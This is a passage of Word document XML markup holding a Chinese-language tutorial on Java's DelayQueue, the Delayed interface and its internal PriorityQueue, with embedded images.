        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口的实现和</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，其特化的参数是</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。（不了解</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的同学，先去了解</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>再看本文）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>扩展了</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口，比较的基准为延时的时间值，</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口的实现类</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getDelay</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的返回值应为固定值（</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PriorityQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="381"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">DelayQueue = </w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue + PriorityQueue + Delayed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的关键元素</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PriorityQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。可以这么说，</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一个使用优先队列（</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PriorityQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，优先队列的比较基准值是时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B321D6" w:rsidRDefault="00CD13CD" w:rsidP="00E91E5F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5273741" cy="2060812"/>
            <wp:effectExtent l="19050" t="0" r="3109" b="0"/>
            <wp:docPr id="29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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2061034"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD13CD" w:rsidRDefault="00CD13CD" w:rsidP="00CD13CD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="381"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部的实现使用了一个优先队列。当调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>offer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法时，把</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Delayed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>对象加入到优先队列</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD13CD" w:rsidRPr="00CD13CD" w:rsidRDefault="00CD13CD" w:rsidP="00CD13CD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="381"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2911550"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="29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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
